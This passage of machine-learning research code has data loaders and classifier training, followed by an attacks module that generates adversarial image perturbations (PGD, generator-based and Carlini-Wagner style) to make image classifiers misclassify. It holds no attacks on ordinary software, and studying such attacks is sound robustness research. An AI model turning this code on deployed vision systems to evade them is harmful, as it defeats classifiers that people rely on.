x = x.sum(a, keepdim=keepdim)
return x.squeeze().sum()
def L2_dist(x, y):
return torch.mean(torch.norm(x - y,p=2,dim=(1,2,3)))
def L2_norm_dist(x, y):
dist = torch.norm(x - y, p=2,dim=(1,2,3))
return dist
def Linf_dist(x, y):
dist = torch.norm(x - y, float('inf'),dim=(1,2,3))
return dist
class Normalize(nn.Module):
"""
Normalize an image as part of a torch nn.Module
"""
def __init__(self, mean, std):
super(Normalize, self).__init__()
self.mean = torch.Tensor(mean)
self.std = torch.Tensor(std)
def forward(self, x):
num = (x - self.mean.type_as(x)[None,:,None,None])
denom = self.std.type_as(x)[None,:,None,None]
return num / denom
def to_cuda(model):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
model = torch.nn.DataParallel(model,\
device_ids=range(torch.cuda.device_count())).cuda()
return model
def tensor_to_cuda(x):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
x = x.cuda()
return x
def display_tensor(tensor):
plt.imshow((tensor)[0].detach().numpy().transpose(1,2,0))
plt.show()
def save_image_to_wandb(args,image,name,normalize):
batch_size,nc,h,w = image.shape
image, image_reshaped = to_img(image.cpu().data,nc,h,w)
save_image(image, name, normalize=normalize)
return image_reshaped.detach().cpu().numpy()
def load_imagenet_classes():
with open("references/adver_robust/introduction/imagenet_class_index.json") as f:
imagenet_classes = {int(i):x[1] for i,x in json.load(f).items()}
return imagenet_classes
def get_single_data(args):
"""
Data loader. For now, just a test sample
"""
assert args.split is None
if args.dataset == 'mnist':
trainloader, testloader = load_mnist(augment=False)
tensor,target = trainloader.dataset[randint(1,\
100)]
tensor = tensor_to_cuda(tensor.unsqueeze(0))
target = tensor_to_cuda(target.unsqueeze(0))
args.classes = 10
elif args.dataset=='cifar':
trainloader, testloader = load_cifar(args,augment=True)
tensor,target = trainloader.dataset[randint(1,\
100)]
tensor = tensor_to_cuda(tensor.unsqueeze(0))
target = tensor_to_cuda(target.unsqueeze(0))
args.classes = 10
else:
pig_img = Image.open("references/adver_robust/introduction/pig.jpg")
preprocess = transforms.Compose([
transforms.Resize(224),
transforms.ToTensor(),
])
tensor = tensor_to_cuda(preprocess(pig_img)[None,:,:,:])
source_class = 341 # pig class
target = tensor_to_cuda(torch.LongTensor([source_class]))
args.classes = 1000
# Get flat input size
args.input_size = tensor[0][0].flatten().shape[0]
return tensor, target
def create_loaders(args, augment=True, normalize=None, root='./data', num_test_samples=None, split=None):
"""
Data loader. For now, just a test sample
"""
if args.dataset == 'mnist':
# Normalize image for MNIST
# normalize = Normalize(mean=(0.1307,), std=(0.3081,))
normalize = None
if args.split is None:
trainloader, testloader = load_mnist(args, augment=False,
root=root, num_test_samples=args.num_test_samples)
else:
trainloader, testloader, s_train_loader, s_test_loader = load_mnist(args, augment=False,
root=root, num_test_samples=args.num_test_samples,
split=split)
args.classes = 10
args.input_size = 784
args.nc, args.h, args.w = 1,28,28
args.clip_min = 0.
args.clip_max = 1.
elif args.dataset=='cifar':
#normalize=Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])
args.input_size = 32*32*3
if args.split is None:
trainloader, testloader = load_cifar(args, augment=False,
normalize=normalize, root=root,
num_test_samples=num_test_samples)
else:
trainloader, testloader, s_train_loader, s_test_loader = load_cifar(args, augment=False,
normalize=normalize, root=root,
num_test_samples=num_test_samples, split=split)
args.classes = 10
args.nc, args.h, args.w = 3,32,32
args.clip_min = -1.
args.clip_max = 1.
else:
# Normalize image for ImageNet
# normalize=utils.Normalize(mean=[0.485,0.456,0.406],std=[0.229,0.224,0.225])
# args.input_size = 150528
raise NotImplementedError
if split is None:
return trainloader, testloader, None, None
else:
return trainloader, testloader, s_train_loader, s_test_loader
def load_unk_model(args, filename=None, madry_model=False, name="VGG16"):
"""
Load an unknown model. Used for convenience to easily swap unk model
"""
# First, check if target model is specified in args
if args.train_with_critic_path is not None:
path = args.train_with_critic_path
if not os.path.isdir(path):
msg = "You passed arg `train_with_critic_path` with path "
msg += path + " which is not a valid dir"
sys.exit(msg)
if "madry" in path:
try:
model = args.madry_model[path]
except:
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
model = get_madry_et_al_tf_model(args.dataset, path)
# Hack for now, we cannot load this model twice (tensorflow), so
# store pointer
args.madry_model = {path: model}
elif args.dataset == 'mnist':
# First case is to laod the Madry model
if (
(filename is None) and (args.attack_type == 'nobox') and (args.fixed_critic)
):
# Super hacky, check if Madry model already loaded
print('loading Madry model')
try:
model = args.madry_model
except:
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
path = os.path.join(args.dir_test_models, "madry_challenge_models", args.dataset, "adv_trained")
model = get_madry_et_al_tf_model(args.dataset, path)
# Hack for now, we cannot load this model twice (tensorflow), so
# store pointer
args.madry_model = model
# Generic classifier
elif (filename is None) and (args.attack_type == 'nobox') or (args.source_arch == 'ens_adv'):
print('Loading generic classifier')
if args.source_arch == 'ens_adv' or args.ensemble_adv_trained:
model = model_mnist(type=args.type)
# model = load_model(args, args.model_name, type=args.type)
else:
model = MadryLeNet(args.nc, args.h, args.w).to(args.dev)
elif name == 'PGD Adversarial Training':
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
model = get_madry_et_al_tf_model(args.dataset, filename)
else:
if filename is None:
filename = "saved_models/mnist_cnn.pt"
if os.path.exists(filename):
# very hacky, it fail if the architecture is not the correct one
try:
model = Net(args.nc, args.h, args.w).to(args.dev)
model.load_state_dict(torch.load(filename))
model.eval()
except:
model = MadryLeNet(args.nc, args.h, args.w).to(args.dev)
model.load_state_dict(torch.load(filename))
model.eval()
else:
print("training a model from scratch")
model = main_mnist(args, filename=filename)
elif args.dataset == 'cifar':
if name == 'PGD Adversarial Training':
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
model = get_madry_et_al_tf_model(args.dataset, filename)
else:
init_func, _ = ARCHITECTURES[name]
if (filename is None) and (args.attack_type == 'nobox'):
model = init_func().to(args.dev)
else:
if (filename is None) or (not os.path.exists(filename)):
model = main_cifar(args, name=name)
else:
# model = DenseNet121().to(args.dev)
model = init_func().to(args.dev)
model = nn.DataParallel(model)
#print(filename, model, init_func, name)
model.load_state_dict(torch.load(filename))
model.eval()
else:
# load pre-trained ResNet50
model = resnet50(pretrained=True).to(args.dev)
model = nn.DataParallel(model)
return model
def main_mnist(args, filename, lr=1e-3, num_epochs=11, logger=None, split=None):
if filename is None:
filename = os.path.join('./saved_models/', "mnist_%s.pt" % name)
train_loader, test_loader = create_loaders(args, augment=False, split=split)
model = Net(args.nc, args.h, args.w).to(args.dev)
optimizer = optim.Adam(model.parameters(), lr=lr)
for epoch in range(1, num_epochs):
train_classifier(args, model, args.dev, train_loader, optimizer, epoch, logger)
test_classifier(args, model, args.dev, test_loader, epoch, logger)
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(model.state_dict(), filename)
return model
ARCHITECTURES = {
'VGG16': (VGG, 50),
'res18': (resnet.ResNet18, 500),
'dense121': (densenet.densenet_cifar, 500),
'googlenet': (googlenet.GoogLeNet, 500),
'lenet': (LeNet, 250),
'wide_resnet': (wide_resnet.Wide_ResNet, None),
'VGG16_ens': (VGG, 50),
'res18_ens': (resnet.ResNet18, 500),
'dense121_ens': (densenet.densenet_cifar, 500),
'googlenet_ens': (googlenet.GoogLeNet, 500),
'wide_resnet_ens': (wide_resnet.Wide_ResNet, None)
}
def train_cifar(args, name="VGG16", augment=True, normalize=None,
filename=None, lr=1e-4, num_epochs=100, logger=None, optimizer="adam",
i =0):
if filename is None:
filename = os.path.join('./pretrained_classifiers/cifar/', "%s/" %
name, 'model_%s.pt' % i)
init_func, _ = ARCHITECTURES[name]
print("Training %s" % (name))
model = init_func().to(args.dev)
if name == "wide_resnet":
model.apply(wide_resnet.conv_init)
model = nn.DataParallel(model)
train_loader, test_loader, split_train_loader, split_test_loader = create_loaders(args,
split=args.split, augment=augment, normalize=normalize)
if args.split is not None:
train_loader = split_train_loader
test_loader = split_test_loader
if optimizer == "adam":
_optimizer = optim.Adam(model.parameters(), lr=lr)
elif optimizer == "sgd":
_optimizer = optim.SGD(model.parameters(), lr=cf.learning_rate(lr, num_epochs), momentum=0.9, weight_decay=5e-4)
elif optimizer == "sls":
n_batches_per_epoch = len(train_loader)/float(train_loader.batch_size)
_optimizer = Sls(model.parameters(), n_batches_per_epoch=n_batches_per_epoch)
else:
raise ValueError("Only supports adam or sgd for optimizer.")
best_acc = 0
for epoch in range(1, num_epochs):
if optimizer == "sgd":
_optimizer = optim.SGD(model.parameters(), lr=cf.learning_rate(lr, num_epochs), momentum=0.9, weight_decay=5e-4)
train_classifier(args, model, args.dev, train_loader, _optimizer, epoch, logger=logger)
acc = test_classifier(args, model, args.dev, test_loader, epoch, logger=logger)
if acc > best_acc:
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(model.state_dict(), filename)
best_acc = acc
return model
def main_cifar(args, augment=True):
for name in ARCHITECTURES:
model = train_cifar(args, name=name, augment=augment)
return model
def train_classifier(args, model, device, train_loader, optimizer, epoch, logger=None):
model.train()
criterion = nn.CrossEntropyLoss(reduction="mean")
train_loss = 0
correct = 0
total = 0
early_stop_param = 0.01
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
if isinstance(optimizer, Sls):
def closure():
output = model(data)
loss = criterion(output, target)
return loss
optimizer.step(closure)
else:
loss.backward()
optimizer.step()
train_loss += loss.item()
running_loss = loss.item()
_, predicted = output.max(1)
total += target.size(0)
correct += predicted.eq(target).sum().item()
if batch_idx % 10 == 0:
print(f'Train Epoch: {epoch:d} [{batch_idx * len(data):d}/{len(train_loader.dataset):d} '
f'{100. * batch_idx / len(train_loader):.0f}] \tLoss: {loss.item():.6f} | '
f'Acc: {100. * correct / total:.3f}')
if running_loss < early_stop_param:
print("Early Stopping !!!!!!!!!!")
break
running_loss = 0.0
if logger is not None:
logger.write(dict(train_accuracy=100. * correct / total, loss=loss.item()), epoch)
def test_classifier(args, model, device, test_loader, epoch, logger=None):
model.eval()
test_loss = 0
correct = 0
criterion = nn.CrossEntropyLoss()
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
loss = criterion(output, target)
# sum up batch loss
test_loss += loss.item()
# get the index of the max log-probability
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
acc = 100. * correct / len(test_loader.dataset)
if logger is None:
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'\
.format(test_loss, correct, len(test_loader.dataset), acc))
else:
logger.write(dict(test_loss=test_loss, test_accuracy=acc), epoch)
return acc
def load_cifar(args, augment=False, normalize=None, root='./data', num_test_samples=None, split=None):
"""
Load and normalize the training and test data for CIFAR10
"""
torch.multiprocessing.set_sharing_strategy('file_system')
print('==> Preparing data..')
if augment:
transform_train = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor()]
else:
transform_train = [transforms.ToTensor()]
transform_test = [transforms.ToTensor()]
if normalize is not None:
transform_train.append(normalize)
transform_test.append(normalize)
transform_train = transforms.Compose(transform_train)
transform_test = transforms.Compose(transform_test)
if split is None:
train_set = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform_train)
test_set = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform_test)
else:
dataset_split = create_dataset_split(args, root=root, num_splits=6, augment=augment)
assert split < len(dataset_split)
train_splits, test_splits = [], []
for i in range(0,len(dataset_split)):
dataset = dataset_split[i]
train_set, test_set = dataset["train"], dataset["test"]
train_splits.append(train_set)
test_splits.append(test_set)
split_train_dataset = ConcatDataset(train_splits)
split_test_dataset = ConcatDataset(test_splits)
if num_test_samples is not None:
generator = None
indices = torch.randint(len(split_test_dataset), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
split_test_dataset = Subset(split_test_dataset, indices)
split_train_loader = torch.utils.data.DataLoader(split_train_dataset,
batch_size=args.batch_size, shuffle=True, pin_memory=True)
split_test_loader = torch.utils.data.DataLoader(split_test_dataset,
batch_size=args.batch_size, shuffle=False, pin_memory=True)
dataset = dataset_split[split]
train_set, test_set = dataset["train"], dataset["test"]
if num_test_samples is not None:
generator = None
indices = torch.randint(len(test_set), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
test_set = Subset(test_set, indices)
# if args.train_set == 'test':
# train_set = test_set
# elif args.train_set == 'train_and_test':
# train_set = torch.utils.data.ConcatDataset([train_set,test_set])
trainloader = torch.utils.data.DataLoader(train_set,batch_size=args.batch_size,
shuffle=True, num_workers=0,
pin_memory=True)
testloader = torch.utils.data.DataLoader(test_set,batch_size=args.test_batch_size,
shuffle=False, num_workers=0,
pin_memory=True)
if split is None:
return trainloader, testloader
else:
return trainloader, testloader, split_train_loader, split_test_loader
return trainloader, testloader
def load_mnist(args, augment=True, root='./data', num_test_samples=None, split=None):
"""
Load and normalize the training and test data for MNIST
"""
print('==> Preparing data..')
test_transforms = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
if augment:
train_transforms = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
else:
mnist_transforms = transforms.Compose([
transforms.ToTensor(),
])
if split is None:
train_set = datasets.MNIST(root=root, train=True, download=True,
transform=mnist_transforms)
test_set = datasets.MNIST(root=root, train=False, transform=mnist_transforms)
else:
dataset_split = create_dataset_split(args, root=root, num_splits=7,
transform=mnist_transforms, augment=augment)
assert split < len(dataset_split)
train_splits, test_splits = [], []
for i in range(0,7):
dataset = dataset_split[i]
train_set, test_set = dataset["train"], dataset["test"]
train_splits.append(train_set)
test_splits.append(test_set)
split_train_dataset = ConcatDataset(train_splits)
split_test_dataset = ConcatDataset(test_splits)
if num_test_samples is not None:
generator = None
indices = torch.randint(len(split_test_dataset), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
split_test_dataset = Subset(split_test_dataset, indices)
split_train_loader = torch.utils.data.DataLoader(split_train_dataset,
batch_size=args.batch_size, shuffle=True)
split_test_loader = torch.utils.data.DataLoader(split_test_dataset,
batch_size=args.batch_size, shuffle=False)
dataset = dataset_split[split]
train_set, test_set = dataset["train"], dataset["test"]
if num_test_samples is not None:
generator = None
indices = torch.randint(len(test_set), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
test_set = Subset(test_set, indices)
# if args.train_set == 'test':
# train_set = test_set
# elif args.train_set == 'train_and_test':
# train_set = torch.utils.data.ConcatDataset([train_set, test_set])
trainloader = torch.utils.data.DataLoader(train_set,
batch_size=args.batch_size, shuffle=True)
testloader = torch.utils.data.DataLoader(test_set,
batch_size=args.batch_size, shuffle=False)
if split is None:
return trainloader, testloader
else:
return trainloader, testloader, split_train_loader, split_test_loader
def to_img(x,nc,h,w):
# x = x.clamp(0, 1)
x = x.view(x.size(0), nc, h, w)
x_reshaped = x.permute(0,2,3,1)
return x, x_reshaped
def freeze_model(model):
model.eval()
for params in model.parameters():
params.requires_grad = False
return model
def nobox_wandb(args, epoch, x, target, adv_inputs, adv_out, adv_correct,
clean_correct, loss_misclassify, loss_model, loss_perturb,
loss_gen, train_loader):
n_imgs = min(30, len(x))
clean_image = (x)[:n_imgs].detach()
adver_image = (adv_inputs)[:n_imgs].detach()
if args.dataset == 'cifar':
factor = 10.
else:
factor = 1.
delta_image = factor*(adver_image - clean_image)
file_base = "adv_images/train/" + args.namestr + "/"
if not os.path.exists(file_base):
os.makedirs(file_base)
# import pdb; pdb.set_trace()
img2log_clean = save_image_to_wandb(args, clean_image, file_base + "clean.png", normalize=True)
img2log_adver = save_image_to_wandb(args, adver_image, file_base + "adver.png", normalize=True)
img2log_delta = save_image_to_wandb(args, delta_image, file_base + "delta.png", normalize=True)
adv_acc = 100. * adv_correct.cpu().numpy() / len(train_loader.dataset)
clean_acc = 100. * clean_correct.cpu().numpy() / len(train_loader.dataset)
wandb.log({"Adv. Train Accuracy": adv_acc,
"Clean Train Accuracy": clean_acc,
"Misclassification Loss": loss_misclassify.item(),
"Critic Loss": loss_model.item(),
"Perturb Loss": loss_perturb.item(), "x": epoch,
'Gen Loss': loss_gen.item(),
'Train_Clean_image': [wandb.Image(img, caption="Train Clean") for img in img2log_clean],
'Train_Adver_image': [wandb.Image(img, caption="Train Adv, "f"Label: {target[i]}"
f" Predicted: {adv_out[i].item()}")
for i, img in enumerate(img2log_adver)],
'Train_Delta_image': [wandb.Image(img, caption="Train Delta") for img in img2log_delta]
})
def concat_dataset(args, loader_1, loader_2):
dataset_1 = loader_1.datset
dataset_2 = loader_2.dataset
dataset_tot = torch.utils.data.ConcatDataset([dataset_1, dataset_2])
return torch.utils.data.DataLoader(dataset_tot,
batch_size=args.batch_size, shuffle=True)
kwargs_perturb_loss = {'Linf': Linf_dist, 'L2': L2_dist}
``` |
{
"source": "joeybose/BlackMagicDesign",
"score": 2
} |
#### File: joeybose/BlackMagicDesign/attacks.py
```python
from PIL import Image
from torchvision import transforms
import torch
from models import *
from torch import nn, optim
from torchvision.models import resnet50
from torchvision.models.vgg import VGG
import torchvision.models.densenet as densenet
import torchvision.models.alexnet as alexnet
from torchvision.utils import save_image
import torch.nn.functional as F
from advertorch.utils import batch_multiply
from advertorch.utils import batch_clamp
from advertorch.utils import clamp
from torch import optim
from torch.autograd import Variable
import json
import os
import numpy as np
import argparse
from tqdm import tqdm
from utils import *
import ipdb
from advertorch.attacks import LinfPGDAttack, L2PGDAttack
def whitebox_pgd(args, model):
adversary = L2PGDAttack(
model, loss_fn=nn.CrossEntropyLoss(reduction="sum"), eps=0.3,
nb_iter=40, eps_iter=0.01, rand_init=True, clip_min=-1.0, clip_max=1.0,
targeted=False)
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform_train)
train_loader = torch.utils.data.DataLoader(trainset,batch_size=1,
shuffle=True, num_workers=8)
train_itr = tqdm(enumerate(train_loader),total=len(train_loader.dataset))
correct = 0
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
adv_image = adversary.perturb(x, target)
pred = model(adv_image)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += out.eq(target.unsqueeze(1).data)
acc = 100. * correct.cpu().numpy() / len(train_loader.dataset)
print("PGD attack succes rate %f" %(acc))
def white_box_untargeted(args, image, target, model, enc=None, dec=None, \
vae=None, ae= None, normalize=None):
epsilon = 0.3
# Create noise vector
delta = torch.zeros_like(image,requires_grad=True).to(args.device)
# Optimize noise vector (only) to fool model
x = image
use_vae = True if (vae is not None) else False
use_ae = True if (ae is not None) else False
print("Target is %d" %(target))
for t in range(args.PGD_steps):
if normalize is not None:
if use_vae:
x = x.view(x.size(0), -1).unsqueeze(0)
z, mu, logvar = vae(x)
z = z.clamp(0, 1)
x = z.view(z.size(0), 1, 28, 28)
elif use_ae:
x = ae(x)
pred = model(normalize(x + delta))
else:
if use_vae:
x = x.view(x.size(0), -1).unsqueeze(0)
z, mu, logvar = vae(x)
z = z.clamp(0, 1)
x = z.view(z.size(0), 1, 28, 28)
elif use_ae:
x = ae(x)
pred = model(x.detach() + delta)
recon_pred = model(x.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
recon_out = recon_pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = nn.CrossEntropyLoss(reduction="sum")(pred, target)
recon_image = (x)[0].detach()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
plot_image_to_comet(args,recon_image,"recon.png")
if t % 5 == 0:
print(t, out[0][0], recon_out[0][0], loss.item())
loss.backward()
grad_sign = delta.grad.data.sign()
delta.data = delta.data + batch_multiply(0.01, grad_sign)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = clamp(x.data + delta.data,0.,1.) - x.data
delta.grad.data.zero_()
# if out != target:
# print(t, out[0][0], loss.item())
# break
if args.comet:
if not args.mnist:
clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
else:
clean_image = (image)[0].detach()
adv_image = (x + delta)[0].detach()
recon_image = (x)[0].detach()
delta_image = (delta)[0].detach().cpu()
plot_image_to_comet(args,clean_image,"clean.png")
plot_image_to_comet(args,adv_image,"Adv.png")
plot_image_to_comet(args,delta_image,"delta.png")
plot_image_to_comet(args,recon_image,"recon.png")
return out, delta
def single_white_box_generator(args, image, target, model, G):
epsilon = 0.5
# Create noise vector
x = image
opt = optim.SGD(G.parameters(), lr=1e-2)
print("Target is %d" %(target))
for t in range(args.PGD_steps):
delta, kl_div = G(x)
delta = delta.view(delta.size(0), 1, 28, 28)
delta.data.clamp_(-epsilon, epsilon)
delta.data = clamp(x.data + delta.data,0.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = -nn.CrossEntropyLoss(reduction="sum")(pred, target)
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
if t % 5 == 0:
print(t, out[0][0], loss.item())
opt.zero_grad()
loss.backward()
for p in G.parameters():
p.grad.data.sign_()
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
# delta.data.clamp_(-epsilon, epsilon)
# delta.data = clamp(x.data + delta.data,0.,1.) - x.data
opt.step()
if out != target:
print(t, out[0][0], loss.item())
break
if args.comet:
if not args.mnist:
clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
else:
clean_image = (image)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png")
plot_image_to_comet(args,adv_image,"Adv.png")
plot_image_to_comet(args,delta_image,"delta.png")
return out, delta
def PGD_generate_multiple_samples(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
epsilon = args.epsilon
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.test_batch_size)
correct_test = 0
correct_batch_avg_list = []
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
correct_batch_avg = 0
for t in range(10):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct_batch_avg = out.eq(target.unsqueeze(1).data).sum()
correct_batch_avg = correct_batch_avg / (10*len(x))
correct_batch_avg_list.append(correct_batch_avg)
correct_test += out.eq(target.unsqueeze(1).data).sum()
batch_avg = sum(correct_batch_avg) / len(correct_batch_avg)
print('\nTest set: Accuracy: {}/{} ({:.0f}%) | Multiple Samples Accuracy{:.0f}\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test / len(test_loader.dataset), batch_avg))
if args.comet:
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def PGD_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
''' Testing Phase '''
epsilon = args.epsilon
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.test_batch_size)
correct_test = 0
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
# for t in range(args.PGD_steps):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct_test += out.eq(target.unsqueeze(1).data).sum()
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test / len(test_loader.dataset)))
if args.comet:
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def L2_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28,mode="NotTest"):
''' Testing Phase '''
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.batch_size)
correct_test = 0
# Empty list to hold resampling results. Since we loop batches, results
# accumulate in appropriate list index, where index is the sampling number
resample_adv = [[] for i in range(args.resample_iterations)]
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
adv_inputs = x + delta
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
corr_adv_tensor = out.eq(target.unsqueeze(1).data)
correct_test += out.eq(target.unsqueeze(1).data).sum()
idx = corr_adv_tensor > 0
# Resample failed examples
if mode == 'Test' and args.resample_test:
re_x = x.detach()
for j in range(args.resample_iterations):
if len(re_x) == 0:
break
delta, kl_div = G(re_x)
adv_inputs = re_x + delta.detach()
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
# From previous correct adv tensor,get indices for correctly pred
# Since we care about those on which attack failed
correct_failed_adv = out.eq(target.unsqueeze(1).data)
failed_only = correct_failed_adv[idx]
for i in range(0,len(idx)):
if idx[i] == 1:
if correct_failed_adv[i] == 0:
idx[i] = 0
resample_adv[j].extend(failed_only.cpu().numpy().tolist())
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test.cpu().numpy() / len(test_loader.dataset)))
if args.comet:
test_acc = 100. * correct_test / len(test_loader.dataset)
args.experiment.log_metric("Test Adv Accuracy",test_acc,step=epoch)
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()
adv_image = (x + delta)[index:index+64].detach()
delta_image = (delta)[index:index+64].detach()
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
file_base = "adv_images/" + args.namestr + "/"
if not os.path.exists(file_base):
os.makedirs(file_base)
plot_image_to_comet(args,clean_image,file_base+"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,file_base+"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,file_base+"delta.png",normalize=True)
# Log resampling stuff
if mode =='Test' and args.resample_test:
cumulative = 0
size_test = len(resample_adv[0])
for j in range(len(resample_adv)):
fooled = len(resample_adv[j]) - sum(resample_adv[j])
if len(resample_adv[j]) == 0:
percent_fooled = 0
else:
percent_fooled = fooled / len(resample_adv[j])
cumulative += fooled
cum_per_fooled = cumulative / size_test
print("Resampling perc fooled %f at step %d" % (percent_fooled,j))
print("Resampling perc cumulative fooled %f at step %d" % (cum_per_fooled,j))
if args.comet:
args.experiment.log_metric("Resampling perc fooled",percent_fooled,step=j)
args.experiment.log_metric("Resampling perc cumulative fooled",cum_per_fooled,step=j)
def carlini_wagner_loss(args, output, target, scale_const=1):
# compute the probability of the label class versus the maximum other
target_onehot = torch.zeros(target.size() + (args.classes,))
target_onehot = target_onehot.cuda()
target_onehot.scatter_(1, target.unsqueeze(1), 1.)
target_var = Variable(target_onehot, requires_grad=False)
real = (target_var * output).sum(1)
confidence = 0
other = ((1. - target_var) * output - target_var * 10000.).max(1)[0]
# if targeted:
# # if targeted, optimize for making the other class most likely
# loss1 = torch.clamp(other - real + confidence, min=0.) # equiv to max(..., 0.)
# else:
# if non-targeted, optimize for making this class least likely.
